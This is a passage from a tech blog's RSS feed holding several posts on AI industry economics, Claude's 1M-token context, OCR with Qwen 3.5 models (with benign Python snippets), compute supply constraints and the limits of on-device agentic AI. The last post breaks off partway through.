<p>While this actually works to some degree, it has a lot of drawbacks.</p>
<p>Firstly, if you're working on a project with many files - which is very common - it often has to start by reminding itself of all these files as the summary isn't detailed enough. This can quickly end up with a bit of a catch 22, where it compacts, reads a tonne of files, then is running low on context to continue. As agents continue to improve in their abilities on very complicated tasks this becomes more and more of an issue.</p>
<p>Secondly, and the more obvious one, is that some agentic tasks <em>do</em> genuinely need to have far more documents in their context window. A classic one is legal tasks - if you are wanting the agent to cross reference hundreds of contracts, it's best for the agent to have the entire contract in its context window, not just summarised/excerpts which can result in poor interpretations. Same for many financial analyst tasks with investor reports.</p>
<p>Ironically software is <em>far</em> better suited to being &quot;excerpted&quot; than many other professional service tasks - programming languages by their nature are far more &quot;modular&quot; and structured than standard &quot;human&quot; documents, and therefore naturally can be searched through and snapshotted with far better results than many other types of documents.</p>
<p>Finally, and an often overlooked one, the models are very good at inferring a lot more from your instructions than is probably obvious. There has been an increasing amount of research on how LLMs can infer a lot about a user's <a href="https://www.paubox.com/blog/how-llms-quietly-map-emotional-tone-across-entire-inbox-ecosystems">emotional state</a> from &quot;unrelated&quot; messages.</p>
<p>But beyond emotions, I think we end up encoding a lot more subtlety into our agent sessions than we realise. Using compaction - or any form of 'note taking' often loses a lot of this, much like how reading meeting minutes often doesn't capture the <em>actual</em> energy in a meeting.</p>
<h2>Cost - the big surprise</h2>
<p>The <em>real</em> reason this is a big deal is that Anthropic is not charging any more for it. Google and OpenAI both charge 2x input prices past 200-272K tokens - Gemini 3.1 Pro goes from $2 to $4/M, GPT-5.4 from $2.50 to $5/M. Anthropic used to do the same, but with the 4.6 release they've dropped the surcharge entirely.</p>
<p>They've also included it in the Max and Business subscriptions, which Codex (as of writing) doesn't. The competition is <em>relentless</em> in this space.</p>
<p>I had very much expected this to stay behind some &quot;extra usage&quot; flag and at Anthropic's API pricing, ruinously expensive for all but the most valuable agentic workflows.</p>
<p>This also enables <em>enormous</em> token consumption. You can have one agent with 1M context manage and orchestrate many subagents - each with their own 1M context window. The issue with the 128-200K token lengths before was even if your subagent tasks could fit in that, your 'main' orchestration agent would run out of context.</p>
<p>We'll see how this plays out as third party benchmarks come in and more people push it to its limits. But if first impressions hold, this quietly might be one of the most impactful releases of the year.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>This is a gross simplification. Different data types (for example programming languages or structured data like JSON or CSV) can use a <em>lot</em> more tokens for the same amount of 'characters' on a document. If you're interested in learning more about this, I'd recommend <a href="https://christophergs.com/blog/understanding-llm-tokenization">this article</a> <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/why-claudes-new-1m-context-length-is-a-big-deal/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/why-claudes-new-1m-context-length-is-a-big-deal/</guid>
      <pubDate>Sun, 15 Mar 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>How to use the Qwen 3.5 LLMs to OCR documents</title>
      <description>Using Qwen 3.5 open weights models to OCR scanned PDFs - locally on consumer hardware or via OpenRouter for pennies</description>
      <content:encoded><![CDATA[<p>I've always been really impressed with how well the Gemini models do OCR of difficult PDFs - not nicely formatted PDFs, but badly scanned images in a PDF file.</p>
<p>Increasingly though, Google has increased the price of their 'Flash' models. While they are far more capable than existing ones, it's overkill for document OCRing.</p>
<p>I've always been interested in replicating this capability with open weights models - it's not ideal sending sensitive documents to Google for OCR, and even if not, if you're doing a <em>lot</em> of documents it quickly becomes unaffordable with Gemini.</p>
<h2>Running Qwen 3.5</h2>
<p>Qwen 3.5 is an open weights model (you can download and use the model as you want) from Alibaba. They're <em>really</em> good, and I think it does pass a bit of a threshold of capabilities in small open weights models. Crucially, <em>all</em> of these models are multimodal - they can handle text <em>and</em> vision input. Previously the smallest vision-capable open weights models were around 4-5B parameters, so having multimodal models down to 0.8B and 2B is a big deal.</p>
<p>The Qwen 3.5 models come in a bunch of sizes. The more parameters the model has, the &quot;better&quot; the model is, but at the cost of speed and memory usage:</p>
<table>
<thead>
<tr>
<th>Model</th>
<th>Type</th>
<th>Params</th>
<th>Q4_K_M Size</th>
</tr>
</thead>
<tbody>
<tr>
<td>Qwen3.5-0.8B</td>
<td>Dense</td>
<td>0.8B</td>
<td>533 MB</td>
</tr>
<tr>
<td>Qwen3.5-2B</td>
<td>Dense</td>
<td>2B</td>
<td>1.28 GB</td>
</tr>
<tr>
<td>Qwen3.5-4B</td>
<td>Dense</td>
<td>4B</td>
<td>2.74 GB</td>
</tr>
<tr>
<td>Qwen3.5-9B</td>
<td>Dense</td>
<td>9B</td>
<td>5.68 GB</td>
</tr>
<tr>
<td>Qwen3.5-27B</td>
<td>Dense</td>
<td>27B</td>
<td>16.7 GB</td>
</tr>
<tr>
<td>Qwen3.5-35B-A3B</td>
<td>MoE</td>
<td>35B (3B active)</td>
<td>22 GB</td>
</tr>
<tr>
<td>Qwen3.5-122B-A10B</td>
<td>MoE</td>
<td>122B (10B active)</td>
<td>76.5 GB</td>
</tr>
<tr>
<td>Qwen3.5-397B-A17B</td>
<td>MoE</td>
<td>397B (17B active)</td>
<td>244 GB</td>
</tr>
</tbody>
</table>
<p>I did a bunch of experiments and it seems for OCRing Qwen3.5-9B is the sweet spot. The results are surprisingly good even down to 0.8B, but the quality does drop off as you'd expect on the smaller models - in my experience the smaller models tend to struggle to keep &quot;on task&quot; when OCRing and end up summarising documents instead, especially as they get more complicated.</p>
<h2>How to OCR PDFs with them</h2>
<p>The first thing I do is use <code>PyMuPDF</code> to extract each page of the input PDF into separate image files. This library is really fast, a lot of the others were incredibly slow at extracting them. You can use code like this (or tell your agent of choice to use it!):</p>
<pre><code class="language-python">import fitz

doc = fitz.open(&quot;document.pdf&quot;)
for i, page in enumerate(doc):
    pix = page.get_pixmap(dpi=100)
    pix.save(f&quot;page_{i+1}.jpg&quot;)
</code></pre>
<p>This will open <code>document.pdf</code> and save each of the pages as <code>page_1.jpg</code> at 100dpi, which with some rough experiments gave good results, but your mileage may vary - feel free to increase or decrease that number.</p>
<p>Once you've done that, you've got two options - either running locally or doing this on a cloud provider.</p>
<h2>Running locally</h2>
<p>If you want to run it locally, you can try using it with LM Studio, which makes it really easy to install and run local models. Just download it, install, download the model of your choice and start the API server. I'd recommend turning off thinking mode in the settings.</p>
<p>I used Python code along these lines to do it (you'll want to do this in a loop if you have more than one page!):</p>
<pre><code class="language-python">import base64
import httpx

def ocr_image(image_path):
    with open(image_path, &quot;rb&quot;) as f:
        b64 = base64.b64encode(f.read()).decode()

    resp = httpx.post(&quot;http://localhost:1234/v1/chat/completions&quot;,
        json={
            &quot;messages&quot;: [{&quot;role&quot;: &quot;user&quot;, &quot;content&quot;: [
                {&quot;type&quot;: &quot;image_url&quot;, &quot;image_url&quot;: {&quot;url&quot;: f&quot;data:image/jpeg;base64,{b64}&quot;}},
                {&quot;type&quot;: &quot;text&quot;, &quot;text&quot;: &quot;OCR this document page. Return all the text exactly as it appears, preserving layout where possible. Use markdown formatting for tables and lists. Do not add any commentary.&quot;},
            ]}],
            &quot;temperature&quot;: 0,
        },
        timeout=120.0,
    )
    return resp.json()[&quot;choices&quot;][0][&quot;message&quot;][&quot;content&quot;]

print(ocr_image(&quot;page_1.jpg&quot;))
</code></pre>
<p>On my Radeon 9070XT I got around 3s/page of dense text. While not bad, if you're doing thousands/millions of pages it's probably too slow and you need more hardware. The smaller models were far, far faster but suffered from unreliable output quality.</p>
<p>I <em>think</em> with more tweaking I could get a lot more speed out of the hardware even on the 9b model. LM Studio isn't great at batching prefill and decode efficiently so there was a lot of wasted compute doing multiple pages. I think with time this will become incredibly viable. Equally if you have some higher end hardware then this would be very viable as an on-prem solution.</p>
<p>If you've got sensitive documents you want to OCR but don't want to send to <em>any</em> cloud provider this is really a great option, and I'm sure with time it'll get even faster.</p>
<h2>Running with OpenRouter</h2>
<p>If you need far more speed than this, then <a href="https://openrouter.ai/qwen/qwen3.5-9b">OpenRouter</a> has two (at the time of writing) providers hosting the 9b variant:</p>
<img src="https://martinalderson.com/img/openrouter-qwen-pricing.png" alt="OpenRouter pricing for Qwen 3.5 9B" class="no-border" style="display: block; margin: 1.5em auto;">
It's outrageously cheap. Each page you OCR is around 1,000 input tokens and 500 output tokens - depending on complexity - this means to OCR 1,000 pages it comes out at around 12 cents (!) with Venice.
<p>It's also very, very fast as you can send many pages at once to OpenRouter to OCR. I didn't have any issues sending 128 pages at a time, with each page taking ~10s. This means it will take just over a minute to do 1,000 pages. I don't know if there are rate limits above that, but it's possible you could scale even further with more threads.</p>
<p>To do this, just replace the code above with a call to OpenRouter, and I used the ThreadPoolExecutor to send many pages at once:</p>
<pre><code class="language-python">from concurrent.futures import ThreadPoolExecutor, as_completed

with ThreadPoolExecutor(max_workers=128) as pool:
    futures = {pool.submit(ocr_image, f&quot;page_{i}.jpg&quot;): i for i in range(1, num_pages + 1)}
    for future in as_completed(futures):
        page_num = futures[future]
        result = future.result()  # blocks until this page's HTTP request completes
        print(f&quot;Page {page_num} done&quot;)
</code></pre>
<h2>Final thoughts</h2>
<p>Because you can run so many threads at once, this is actually better, faster <em>and</em> cheaper than trying to do this with the frontier lab APIs like OpenAI or Google. In my experience, trying to do more than a few simultaneous requests to OpenAI will result in rate limits unless you're spending serious money with them. So for bulk OCR, running Qwen 3.5 via OpenRouter is genuinely a better solution than something like GPT-5 Nano. And once you've got the text out of these PDFs you can do whatever you want with them &quot;as normal&quot; with LLMs - search, understand and extract insights out of them like you would with any other text.</p>
<p>I think this is also a big deal for digitising old documents for historical research. It used to be incredibly expensive - old scanned documents wouldn't OCR properly with traditional techniques and often needed to be transcribed by hand. Running one of these models locally on a laptop could now do it for free, and throwing it at OpenRouter could chew through entire archives for pennies.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/how-to-use-qwen-3-5-to-ocr-documents/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/how-to-use-qwen-3-5-to-ocr-documents/</guid>
      <pubDate>Fri, 13 Mar 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>No, it doesn&#39;t cost Anthropic $5k per Claude Code user</title>
      <description>The viral claim that Anthropic loses $5,000 per Claude Code subscriber doesn&#39;t survive basic scrutiny. Let&#39;s do the actual maths.</description>
      <content:encoded><![CDATA[<p>My LinkedIn and Twitter feeds are full of screenshots from the recent <a href="https://www.forbes.com/sites/annatong/2026/03/05/cursor-goes-to-war-for-ai-coding-dominance/">Forbes article on Cursor</a> claiming that Anthropic's $200/month Claude Code Max plan can consume $5,000 in compute. The relevant quote:</p>
<blockquote>
<p>Today, that subsidization appears to be even more aggressive, with that $200 plan able to consume about $5,000 in compute, according to a different person who has seen analyses on the company's compute spend patterns.</p>
</blockquote>
<p>This is being shared as proof that Anthropic is haemorrhaging money on inference. It doesn't survive basic scrutiny.</p>
<h2>What the $5,000 figure actually is</h2>
<p>I'm fairly confident the Forbes sources are confusing <em>retail API prices</em> with <em>actual compute costs</em>. These are very different things.</p>
<p>Anthropic's current API pricing for Opus 4.6 is $5 per million input tokens and $25 per million output tokens. At those prices, yes - a heavy Claude Code Max 20 user could rack up $5,000/month in API-equivalent usage. That maths checks out.<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup></p>
<p>But API pricing is not what it costs Anthropic to serve those tokens.</p>
<h2>The OpenRouter reality check</h2>
<p>The best way to estimate what inference actually costs is to look at what open-weight models of similar size are priced at on OpenRouter - where multiple providers compete on price.</p>
<p>Qwen 3.5 397B-A17B is a good comparison point. It's a large MoE model, broadly comparable in architecture size to what Opus 4.6 is likely to be. Equally, so is Kimi K2.5 1T params with 32B active, which is probably approaching the upper limit of what you can efficiently serve.</p>
<p>Here's what the pricing looks like:</p>
<img src="https://martinalderson.com/img/openrouter-qwen-opus-pricing.png" alt="OpenRouter pricing showing Qwen 3.5 397B and Kimi K2.5 at roughly 10% of Claude Opus 4.6 API pricing per token" class="no-border" style="display: block; margin: 1.5em auto 2.5em;">
<p>The Qwen 3.5 397B model on OpenRouter (via Alibaba Cloud) costs <em>$0.39</em> per million input tokens and <em>$2.34</em> per million output tokens. Compare that to Opus 4.6's API pricing of $5/$25. Kimi K2.5 is even cheaper at $0.45 per million input tokens and $2.25 output.</p>
<p>That's roughly <em>10x cheaper</em>.</p>
<p>And this ratio holds for cached tokens too - DeepInfra charges $0.07/MTok for cache reads on Kimi K2.5 vs Anthropic's $0.50/MTok.</p>
<p>These OpenRouter providers are running a business. They have to cover their compute costs, pay for GPUs, and make a margin. They're not charities. If so many can serve a model of comparable size at ~10% of Anthropic's API price and remain in business, it is hard for me to believe that they are all taking enormous losses (at ~the exact same rate range).</p>
<p>If a heavy Claude Code Max user consumes $5,000 worth of tokens at Anthropic's <em>retail API prices</em>, and the actual compute cost is roughly 10% of that, Anthropic is looking at approximately $500 in real compute cost for the heaviest users.</p>
<p>That's a loss of $300/month on the most extreme power users - not $4,800.</p>
<p>However, <em>most</em> users don't come anywhere near the limit. Anthropic themselves said when they introduced weekly caps that <a href="https://techcrunch.com/2025/07/28/anthropic-unveils-new-rate-limits-to-curb-claude-code-power-users/">fewer than 5% of subscribers would be affected</a>. I personally use the Max 20x plan and probably consume around 50% of my weekly token budget and it's <em>hard</em> to use that many tokens without getting serious RSI. At that level of usage, the maths works out to roughly break-even or profitable for Anthropic. <sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup></p>
<h2>So who is actually losing $5,000?</h2>
<p>The real story is actually in the article. The $5,000 figure comes from <em>Cursor's internal analysis</em>. And for Cursor, the number probably <em>is</em> roughly correct - because Cursor has to <em>pay Anthropic's retail API prices</em> (or close to it) for access to Opus 4.6.</p>
<p>So to provide a Claude Code-equivalent experience using Opus 4.6, it would cost <em>Cursor</em> ~$5,000 per power user per month. But it would cost <em>Anthropic</em> perhaps $500 max.</p>
<p>And the real issue for Cursor is that developers <em>want</em> to use the Anthropic models, even in Cursor itself. They have real &quot;brand awareness&quot;, and they are genuinely better than the cheaper open weights models - for now at least. It's a <a href="https://techcrunch.com/2025/07/07/cursor-apologizes-for-unclear-pricing-changes-that-upset-users/">real conundrum</a> for them.</p>
<h2>Anthropic is not a profitable company. But inference isn't why.</h2>
<p>Obviously Anthropic isn't printing free cashflow. The costs of training frontier models, the enormous salaries required to hire top AI researchers, the multi-billion dollar compute commitments - these are genuinely massive expenses that dwarf inference costs.</p>
<p>But on a per-user, per-token basis for inference? I believe Anthropic is very likely profitable - potentially <em>very</em> profitable - on the average Claude Code subscriber.</p>
<p>The &quot;AI inference is a money pit&quot; narrative is misinformation that actually plays into the hands of the frontier labs. If everyone believes that serving tokens is wildly expensive, nobody questions the 10x+ markups on API pricing. It discourages competition and makes the moat look deeper than it is.</p>
<p>If you want to understand the real economics of AI inference, don't take API prices at face value. Look at what competitive open-weight model providers charge on OpenRouter. That's a much closer proxy for what it actually costs to run these models - and it's a fraction of what the frontier labs charge.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>A HN user claimed they were burning 150M-200M tok/day. Assuming a 95% cache hit rate and a 90% input/output ratio, this works out at somewhere between $400-$600/day in &quot;API&quot; costs, which is pretty much bang on the $5,000/month estimate ($4,200-$6,000). I got the cache hit rate stats and input/output breakdown from <a href="https://amanhimself.dev/blog/claude-code-tokens-usage/">this blog</a> and scaled it up for that usage. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>According to Anthropic's own <code>/cost</code> <a href="https://code.claude.com/docs/en/costs">command data</a>, the average Claude Code developer uses about <em>$6/day in API-equivalent spend</em>, with 90% under $12/day. That's $180/month average. At 10% actual cost, that's <em>$18/month</em> to serve - against a $20-200 subscription. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/no-it-doesnt-cost-anthropic-5k-per-claude-code-user/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/no-it-doesnt-cost-anthropic-5k-per-claude-code-user/</guid>
      <pubDate>Mon, 09 Mar 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Is the AI Compute Crunch Here?</title>
      <description>Claude Code has 2-3 million users. That&#39;s 1% of knowledge workers. The compute math gets scary from here.</description>
      <content:encoded><![CDATA[<p>In January I wrote about the <a href="https://martinalderson.com/posts/the-coming-ai-compute-crunch/"><em>coming</em> AI compute crunch</a>. Two months later, I think &quot;coming&quot; was the wrong word.</p>
<p>We're starting to see serious signs that some providers are <em>really</em> struggling to meet demand. I still think this is a seriously underpriced risk which has major implications for how much adoption AI can have over the next year or two.</p>
<h2>Supply is struggling to keep up with demand</h2>
<img src="https://martinalderson.com/img/claude-code-growth-tweet.png" alt="Anthropic status page showing degraded performance across claude.ai (98.92% uptime), platform.claude.com (99.16%), Claude API (99.26%), and Claude Code (99.68%) over 30 days" style="max-width: 450px; display: block; margin: 1.5em auto;">
<p><a href="https://status.claude.ai">Anthropic's uptime</a> last week was not good, to say the least. Down to the &quot;one 9&quot; at one point. While they've always had some issues (and IME all the major frontier labs are extremely generous with downtime calculations), it was extremely poor last week.</p>
<p>Interestingly though, some of Anthropic's staff started tweeting that it was down to <a href="https://x.com/trq212/status/2028903322732900764">unprecedented growth</a> - that was &quot;genuinely hard to forecast&quot;.</p>
<p>I think for the first time I can recall, they are actively <em>degrading</em> their product(s) - by their own admission - to attempt to free up enough compute.</p>
<p>Some of the measures they took included reducing the default effort to medium on Opus 4.6, temporarily removing access to the older Opus 4, 4.1 and Sonnet 4.5 models from Claude Code and disabling prompt suggestions.</p>
<p>Now this isn't the end of the world, but given Claude Code is such a high profile and successful product for Anthropic, I'm sure they definitely would not have wanted to take any corrective action like this if they had any alternative.</p>
<p>It's fair to question whether this is just a one time problem caused by a big spike in people migrating from ChatGPT to Claude. But if you've used eg OpenRouter you'll know how painful the reliability is over the entire industry.</p>
<p>Alibaba Cloud's CEO back in November said <a href="https://www.theregister.com/2025/11/26/alibaba_q2_2025">“We’re not even able to keep pace with the growth in customer demand, in terms of the pace at which we can deploy new servers”</a>. 4 months later, the situation is as dire as it was back then:</p>
<img src="https://martinalderson.com/img/alibaba-cloud-openrouter-stats.png" alt="Alibaba Cloud on OpenRouter showing 6tps median throughput and 1.26s latency on Qwen3.5 397B" style="display: block; margin: 1.5em auto;">
<blockquote>
<p>Alibaba Cloud uptime on OpenRouter, showing 6tps median output token/s on their flagship Qwen3.5 397B A17B model, suggesting extreme contention for inference resource still</p>
</blockquote>
<p>It's worth noting that Alibaba Cloud International is headquartered in Singapore, not mainland China, and serves global customers - so the export controls narrative is not as straightforward as it might seem. Regardless, I think it's fair to say that the &quot;AI bubble&quot; narrative of tens/hundreds of billions of dollars of compute needlessly sitting idle is not widespread.</p>
<h2>The agentic inflection point</h2>
<p>As I <a href="https://martinalderson.com/posts/are-we-in-a-gpt4-style-leap-that-evals-cant-see/">wrote back</a> in November, it feels like we passed a significant milestone in the autumn of 2025 in terms of model capabilities. If anything, this has accelerated significantly with Opus 4.6 and (now) GPT 5.4, both of which I've found incredible at SWE tasks (and importantly, other &quot;professional service&quot; tasks).</p>
<p>Given there seems to be no scaling wall currently, at least for &quot;STEM&quot; tasks, more and more complex processes - from <a href="https://www.anthropic.com/engineering/building-c-compiler">building C compilers</a> to <a href="https://www-cs-faculty.stanford.edu/~knuth/papers/claude-cycles.pdf">hard mathematic/algorithmic problems</a> are likely to be well suited for agentic models. This therefore causes more and more demand for tokens - and agentic processes absolutely <em>eat</em> tokens compared to other uses of LLMs.</p>
<img src="https://martinalderson.com/img/model-autonomous-runtime.png" alt="Chart showing model autonomous runtime increasing exponentially from GPT-2 through Claude Opus 4.6 at 12 hours" style="display: block; margin: 1.5em auto;">
Running some napkin maths on this shows still how early this is.
<p>Anthropic published in their <a href="https://www.anthropic.com/news/anthropic-raises-30-billion-series-g-funding-380-billion-post-money-valuation">Series G announcement </a> that Claude Code is doing $2.5b of annual run rate revenue.</p>
<p>If we go off a midpoint of their public pricing, that works out to $200m/month of Claude Code/Cowork revenue - which would be 2 million users at $100/month.<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup></p>
<p>Given the available market of professional/managerial workers in the OECD <em>alone</em> is somewhere in the region of 200-300 million people, and globally over 500 million, it's fair to say that agentic AI tool penetration is in the low single digits % of <em>knowledge workers as a whole</em>. Even if you included OpenCode, Cursor and Codex from OpenAI I very much doubt you have much more penetration, given these tools - unlike Claude Code/Cowork - are heavily adopted by software engineers rather than knowledge workers more broadly.</p>
<p>It's also worth noting that enterprise adoption of Cowork is very much still in pilot phase. Most large organisations are trialling it with small teams, not rolling it out company-wide. If even a fraction of those pilots convert to full deployments over the coming year, the demand increase could be enormous.</p>
<p>If we are starting to see so many provider supply issues with <em>1-2%</em> adoption, it's hard for me to see how the industry is going to cope with much more than 5% of the world's knowledge workers start burning tokens at work with these tools.</p>
<p>As I wrote in <a href="https://martinalderson.com/posts/the-coming-ai-compute-crunch/">the post</a> in January, I believe DRAM supply sets a hard cap of ~15GW of AI infrastructure until 2027. While I won't rewrite the entire article here, this seems extremely tight given the huge adoption curve we are seeing.</p>
<p>Equally, I think many people are misreading AI datacenter delays or cancellations in the press as being due to financing not being available or &quot;cold feet&quot; on behalf of investors or customers. In my eyes, (most) are likely to be slipping significantly because of power, compute, memory and/or (just as importantly) construction labour availability.</p>
<img src="https://martinalderson.com/img/ddr5-ram-prices.png" alt="DDR5-5200 RAM prices rising from $110 to $415 between May and December 2025" style="display: block; margin: 1.5em auto;">
<p>Given DRAM prices continue to rise<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>, until this availability improves, no amount of money from Oracle, Softbank or Codeweaves is going to get you an AI datacentre up and running.</p>
<h2>What to watch for</h2>
<p>I think the recent product changes Anthropic makes are really the canary in the coalmine for inference demand. <em>If</em> I'm directionally correct on this, we're going to see serious inference supply constraints, probably getting increasingly worse over 2026 and 2027 before they get a lot better when new fab capacity starts coming online en masse in 2028.</p>
<p>One thing I really suspect we'll see a lot more of is much more generous rate limits at 'off peak' times - likely to be early morning UTC - as there is no doubt a lot of &quot;idle&quot; compute sitting there<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup>. Squeezing the peaks and troughs here will be essential for improving efficiency of their stack.</p>
<p>If you work in a business or enterprise context with AI providers, I'd <em>strongly</em> recommend locking in annual (or longer) contracts if possible - and assume the number of seats you need will increase much more than just your SWE team.</p>
<p>As end users this is far more difficult. The best hedge is not being locked into a single provider. The switching costs between Claude, OpenAI, Gemini and the open weights models are low - use that to your advantage - I've really enjoyed using OpenCode for many tasks that are very easy to switch out providers.</p>
<p>Of course, I could be wrong. Perhaps SRAM-based inference really takes off into the mainstream and/or enormous efficiency gains are realised and tokens per watt goes stratospheric. But given my day to day experience using Claude Code, Codex, OpenCode and OpenRouter I really don't think that is the correct narrative at the moment.</p>
<p>A lot of the commentary about the AI bubble focuses far too much on the financial engineering. I think looking at the hardware engineering behind the scenes is <em>far</em> more telling.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>You could get 10 million users if you assumed everyone was on the $20/month plan, or ~1million if everyone was on the $200/month plan. My guess is somewhere in the middle, low single figure digits millions. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>DDR5 and HBM (High Bandwidth Memory used in AI accelerators) are different products, but they compete for the same upstream wafer capacity. When memory fabs allocate more wafer starts to HBM production, it reduces DDR5 supply and pushes consumer prices up. The DDR5 price spike is therefore a useful proxy for overall DRAM supply tightness, even though HBM itself trades at much higher ASPs on long-term contracts. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p>Though I'm sure it is being hoovered up for RL inference for training, but I strongly suspect they'd prefer to be selling it to customers. I'm also aware they offer discounts for batch inference, but it's extremely poorly suited for agentic workflows. I think we'll see 'double usage limits' overnight, for example. Or the more negative way of looking at it - that you only get half (or less) the use at peak hours, with your &quot;full&quot; limit being available overnight. <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/is-the-ai-compute-crunch-here/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/is-the-ai-compute-crunch-here/</guid>
      <pubDate>Sat, 07 Mar 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Why on-device agentic AI can&#39;t keep up</title>
      <description>On-device AI agents sound great in theory. The maths on KV cache scaling, RAM budgets, and inference speed says otherwise.</description>
      <content:encoded><![CDATA[<p>There's a growing narrative that on-device AI is about to free us from the cloud - the pitch is compelling. Local inference means privacy, zero latency, no API costs. Run your own agents on your computer or phone, no cloud required.</p>
<p>Indeed, the pace of improvements in open weights models has been spectacular - if you've got (tens of) thousands to drop on a Mac Studio cluster or a high end GPU setup, local models are genuinely useful. But for the other 99% of devices people actually carry around, every time I open llama.cpp to do some local on device work, it feels - if anything - like progress is going backwards relative to what I can do with frontier models.</p>
<p>There are some hard physical limits to what consumer hardware can do - and they're not going away any time soon.</p>
<blockquote>
<p>For the purposes of this article, I'm referring to agentic capabilities in a personal admin capacity. Think searching emails and composing a reply and sending a calendar invite. More advanced capabilities like we see in software engineering are <em>even</em> harder to do on device.</p>
</blockquote>
<h2>The state of RAM</h2>
<p>While the <em>models</em> themselves are getting hugely more capable, there's an intrinsic problem that they require <em>a lot</em> of ideally fast RAM.</p>
<p>Right now, 16GB laptops are the most common configuration for <em>new</em> devices - but 8GB is still very common.</p>
<p>On phones, the situation is (understandably) even more constrained. Apple is still shipping phones with 8GB for the most part - the iPhone 16e and 17 ship with 8GB of RAM, and only the Pro models have 12GB. Google on their Pixel lineup is more generous, shipping 12GB on the 'standard' models, with 16GB on the Pro models.</p>
<p>The issue is that this RAM isn't just for on device AI models. It's also for the OS, running apps. Realistically you want at least 4GB for this - and that's cutting it fine for web browsers and other RAM heavy apps on your phone. On laptops I'd suggest you want at least 8GB of RAM for your OS and apps.</p>
<p>This leaves very little space for the AI capabilities themselves - perhaps 4GB on non-&quot;Pro&quot; models and 8GB on the Pro models. Equally even a new MacBook Air is only going to have 8GB of space in RAM for AI. And these are <em>brand new</em> devices. The majority of people are running multiyear old hardware.</p>
<h2>KV cache eats everything</h2>
<p>The models present one space issue. A 3B param model (which in comparison to frontier models is <em>tiny</em>) requires on the order of 2GB in a highly quantised (think compressed) variant. A 7B param model - which in my experience is vastly more capable - requires more like 5GB. In comparison, full scale models are around the 1TB mark - 200-500x larger.</p>
<p>While this is an incredible achievement to get any level of &quot;intelligence&quot; in such a (relatively) small space, you can see the issue already - a 7B model won't fit in <em>most</em> new consumer hardware, leaving only space for a 3B model.</p>
<p>This is only half of the problem though. You don't just need RAM for storing the model, you also need space to cache the context of the interactions with the models. This is where it quickly becomes unusable for many agentic use cases.</p>
<p>You can get away with a very small amount of context for simple tasks - think text summarisation or tagging. This may fit into a few thousand tokens of KV cache, and is doable on device (both Apple and Google limit on device context to 4K tokens from my research on phones).</p>
<p>Even 'basic' agentic tasks quickly become unusable at this 4K limit though.</p>
<p>Tool definitions (think 'send message', or 'read calendar events') <em>alone</em> probably require that size of context. That's before you start doing prompts against it, or including data from your phone (the actual iMessages, or your emails).</p>
<img src="https://martinalderson.com/img/memory_wall@2x.png" alt="Model weights vs KV cache memory usage at different context lengths, showing iPhone 17 Pro and MacBook Air available RAM limits" class="no-border" style="display: block; margin: 20px auto 40px; max-width: calc(100% - 40px);">
<blockquote>
<p>KV cache memory for a 7B Q4 model at different context lengths. Even at 32K context, you've blown past what an iPhone 17 can offer.</p>
</blockquote>
<p>It simply doesn't work in 4GB, or even 8GB. At a bare minimum I think you'd want 32K tokens of context window, and ideally a 7B+ param model. This is getting close to 16GB of RAM<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> <em>just</em> for the AI part of your device. As such, we need to see consumer devices with 24GB, or ideally 32GB of on device memory before a lot more possibilities open up.</p>
<p>There are techniques that help close the memory gap - grouped-query attention, sliding window attention, quantised KV caches. They're real and they're shipping. But they often trade off precision in exactly the scenarios agentic workflows need most - multi-hop reasoning, precise tool calling, and maintaining coherence across longer conversations. They help, but not nearly enough.</p>
<h2>But then the supply chain issues started</h2>
<p>Arguably we were on track to hit this - 32GB laptops were becoming more common. But then the price of RAM <a href="https://www.tomshardware.com/pc-components/ram/ram-price-index-2026-lowest-price-on-ddr5-and-ddr4-memory-of-all-capacities">skyrocketed over 300%</a>. Manufacturers are more likely to <em>cut</em> RAM now than add more. And given the huge lead time of additional DRAM manufacturing capacity, this situation is unlikely to change in the near future.</p>
<p>This is a great example of <em>crowding out</em>. HBM (datacentre class RAM) and standard DDR5 compete for the same DRAM wafer starts - so every wafer allocated to HBM for datacentres is one not used for the DDR5 in your laptop.</p>
<h2>However, speed is an issue</h2>
<p>Let's run the hypothetical that overnight we have far more DRAM manufacturing capacity across the globe. There's still another massive issue - speed.</p>
<p>While devices have impressively fast compute available to them, especially in something that you can carry around with you in your pocket, there's another context related problem that pops up.</p>
